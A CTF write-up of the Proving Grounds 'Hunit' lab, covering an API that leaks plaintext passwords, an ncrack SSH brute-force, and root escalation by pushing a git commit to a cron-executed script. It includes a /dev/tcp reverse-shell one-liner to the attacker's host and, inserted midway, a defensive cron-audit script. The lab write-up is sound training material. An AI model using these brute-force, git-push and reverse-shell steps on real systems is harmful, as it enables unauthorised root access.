Security Analyst | Security Researcher | CRTP

Proving grounds Practice: Hunit

Proving grounds Practice - Hunit CTF writeup.

NMAP

PORT      STATE SERVICE     VERSION
8080/tcp  open  http-proxy
12445/tcp open  netbios-ssn Samba smbd 4.6.2
18030/tcp open  http        Apache httpd 2.4.46 ((Unix))
43022/tcp open  ssh         OpenSSH 8.4 (protocol 2.0)

8080/tcp open http-proxy

File Discovery: None

Directory Discovery

  • http://192.168.213.125:8080/api/
  • http://192.168.213.125:8080/api/user/

The /api/user/ endpoint discloses user accounts together with their plaintext passwords.

[
  {
    "login": "rjackson",
    "password": "yYJcgYqszv4aGQ",
    "firstname": "Richard",
    "lastname": "Jackson",
    "description": "Editor",
    "id": 1
  },
  {
    "login": "jsanchez",
    "password": "d52cQ1BzyNQycg",
    "firstname": "Jennifer",
    "lastname": "Sanchez",
    "description": "Editor",
    "id": 3
  },
  {
    "login": "dademola",
    "password": "ExplainSlowQuest110",
    "firstname": "Derik",
    "lastname": "Ademola",
    "description": "Admin",
    "id": 6
  },
  {
    "login": "jwinters",
    "password": "KTuGcSW6Zxwd0Q",
    "firstname": "Julie",
    "lastname": "Winters",
    "description": "Editor",
    "id": 7
  },
  {
    "login": "jvargas",
    "password": "OuQ96hcgiM5o9w",
    "firstname": "James",
    "lastname": "Vargas",
    "description": "Editor",
    "id": 10
  }
]

Users

rjackson jsanchez dademola jwinters jvargas

Passwords

yYJcgYqszv4aGQ d52cQ1BzyNQycg ExplainSlowQuest110 KTuGcSW6Zxwd0Q OuQ96hcgiM5o9w

Brute-force the disclosed credentials against SSH

naveenj@hackerspace:|22:22|~/proving_grounds/Hunit/files$ ncrack -vvv ssh://192.168.213.125:43022 -U users -P passwords 

Starting Ncrack 0.7 ( http://ncrack.org ) at 2023-10-23 22:22 EDT

Discovered credentials on ssh://192.168.213.125:43022 'dademola' 'ExplainSlowQuest110'
ssh://192.168.213.125:43022 finished.

Discovered credentials for ssh on 192.168.213.125 43022/tcp:
192.168.213.125 43022/tcp ssh: 'dademola' 'ExplainSlowQuest110'

12445/tcp open netbios-ssn Samba smbd 4.6.2

Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	Commander       Disk      Dademola Files
	IPC$            IPC       IPC Service (Samba 4.13.2)
Reconnecting with SMB1 for workgroup listing.

43022/tcp open ssh OpenSSH 8.4 (protocol 2.0)

SSH in as dademola using dademola:ExplainSlowQuest110

naveenj@hackerspace:|22:25|~/proving_grounds/Hunit$ ssh -p 43022 dademola@192.168.213.125
dademola@192.168.213.125's password:ExplainSlowQuest110
Last login: Tue Oct 24 02:22:47 2023 from 192.168.45.196
[dademola@hunit ~]$ 

Privilege Escalation

Download linpeas to the target over port 8080 and run it; the output shows that a cron job is running.

root 300 0.0 0.0 3644 2220 ? Ss 02:19 0:00 /usr/bin/crond -n

/var/spool/anacron:
total 20
drwxr-xr-x 2 root root 4096 Nov  6  2020 .
drwxr-xr-x 6 root root 4096 Nov  6  2020 ..
-rw------- 1 root root    9 Feb 16  2023 cron.daily
-rw------- 1 root root    9 Feb 16  2023 cron.monthly
-rw------- 1 root root    9 Feb 16  2023 cron.weekly
*/3 * * * * /root/git-server/backups.sh
*/2 * * * * /root/pull.sh

Cron job

  • Found id_rsa and id_rsa.pub keys for root.

Extended capabilities

[dademola@hunit ~]$ getcap -r / 2> /dev/null
/usr/bin/newgidmap cap_setgid=ep
/usr/bin/newuidmap cap_setuid=ep

Exploring cron

[dademola@hunit etc]$ cat crontab.bak 
*/3 * * * * /root/git-server/backups.sh
*/2 * * * * /root/pull.sh
  • Cron runs these two scripts every 3 and 2 minutes respectively.
  • Clone the /git-server folder to /tmp for inspection: git clone file:///git-server
[dademola@hunit git-server]$ cat backups.sh 
#!/bin/bash
#
#
# # Placeholder
#
[dademola@hunit git-server]$ ls -al
total 8
drwxr-xr-x 3 dademola dademola 120 Oct 24 03:04 .
drwxrwxrwt 5 root     root     120 Oct 24 03:04 ..
drwxr-xr-x 8 dademola dademola 260 Oct 24 03:04 .git
-rw-r--r-- 1 dademola dademola   0 Oct 24 03:04 NEW_CHANGE
-rw-r--r-- 1 dademola dademola  63 Oct 24 03:04 README
-rw-r--r-- 1 dademola dademola  34 Oct 24 03:04 backups.sh

The backups.sh file is a placeholder file.
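A defensive counterpart to this finding, added here and not part of the writeup: a POSIX sh audit that reads a crontab such as the crontab.bak above and reports jobs whose script is missing, not owned by the user the crontab runs as, group- or world-writable, or located inside a git working tree (the /root/git-server/backups.sh situation, where a pull rewrites the script root executes). It assumes a root-style crontab without a user field, GNU/Linux `ls -ld` output, and constructs its own sample files.

```shell
#!/bin/sh
# Added audit example (not from the writeup). Reports, per cron job:
#   missing      - the script path does not exist
#   owner        - file owner differs from the user the crontab runs as
#   writable     - group or world write bit set on the script
#   git-tracked  - script sits inside a git working tree, so a pull or a
#                  push from elsewhere rewrites it (the backups.sh case)
#   relative     - command is not an absolute path (resolved via PATH)
# Usage: audit_cron_scripts CRONTAB_FILE [EXPECTED_OWNER]   (default: root)

# Walk up from the script's directory looking for a .git directory.
in_git_worktree() {
    d=$(dirname "$1")
    while [ -n "$d" ] && [ "$d" != "/" ]; do
        [ -d "$d/.git" ] && return 0
        d=$(dirname "$d")
    done
    return 1
}

audit_cron_scripts() {
    cron_file=$1; want=${2:-root}
    while IFS= read -r line || [ -n "$line" ]; do
        # skip blank lines, comments and NAME=value environment settings
        case "$line" in ''|'#'*|[A-Za-z_]*=*) continue ;; esac
        # fields 1-5 are the schedule; field 6 is the command's first word
        cmd=$(printf '%s\n' "$line" | awk '{print $6}')
        case "$cmd" in /*) ;; *) printf 'WARN relative %s\n' "$cmd"; continue ;; esac
        if [ ! -e "$cmd" ]; then printf 'WARN missing %s\n' "$cmd"; continue; fi
        set -- $(ls -ld "$cmd")          # $1 = mode string, $3 = owner
        perm=$1; owner=$3
        reasons=
        [ "$owner" = "$want" ] || reasons="$reasons owner"
        # char 6 = group write bit, char 9 = world write bit in "-rwxr-xr-x"
        case "$perm" in ?????w*|????????w*) reasons="$reasons writable" ;; esac
        in_git_worktree "$cmd" && reasons="$reasons git-tracked"
        if [ -n "$reasons" ]; then printf 'WARN%s %s\n' "$reasons" "$cmd"
        else printf 'OK %s\n' "$cmd"; fi
    done < "$cron_file"
}
```

Run it against a copy of the root crontab (`audit_cron_scripts /etc/crontab.bak root`); on this box the backups.sh job is reported as git-tracked even though its owner and mode look correct.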

To be able to commit to the repository, we first set up a git identity by configuring user.name and user.email with `git config --global user.name "dademola"` and `git config --global user.email "dademola@hunit.(none)"`, respectively.

[dademola@hunit git-server]$ git config --global user.name "dademola"
[dademola@hunit git-server]$ git config --global user.email "dademola@hunit.(none)"

Clone the remote git server from the attacking machine using the discovered SSH key

naveenj@hackerspace:|23:18|~/proving_grounds/Hunit$ GIT_SSH_COMMAND='ssh -i id_rsa -p 43022' git clone git@192.168.213.125:/git-server

Add the reverse shell one-liner to the backups.sh file, then configure git on the local machine and push the updated code.

naveenj@hackerspace:|23:23|~/proving_grounds/Hunit/git-server$ git config --global user.name "naveenj"
naveenj@hackerspace:|23:23|~/proving_grounds/Hunit/git-server$ git config --global user.email "naveenj@kali.(none)"
naveenj@hackerspace:|23:24|~/proving_grounds/Hunit/git-server$ git add -A
naveenj@hackerspace:|23:24|~/proving_grounds/Hunit/git-server$ git commit -m "exp"
#git push
naveenj@hackerspace:|23:25|~/proving_grounds/Hunit/git-server$ GIT_SSH_COMMAND='ssh -i ../id_rsa -p 43022' git push origin master
Enumerating objects: 5, done.
Counting objects: 100% (5/5), done.
Delta compression using up to 4 threads
Compressing objects: 100% (3/3), done.
Writing objects: 100% (3/3), 326 bytes | 326.00 KiB/s, done.
Total 3 (delta 1), reused 0 (delta 0), pack-reused 0
To 192.168.213.125:/git-server
   b50f4e5..eee611b  master -> master

Ensure the shell is in the /git-server folder.

Reverse shell

sh -i >& /dev/tcp/192.168.45.196/8080 0>&1

Once the cron job runs the updated script, a reverse shell with root privileges is obtained.

For more updates and insights, follow me on Twitter: @thevillagehacker.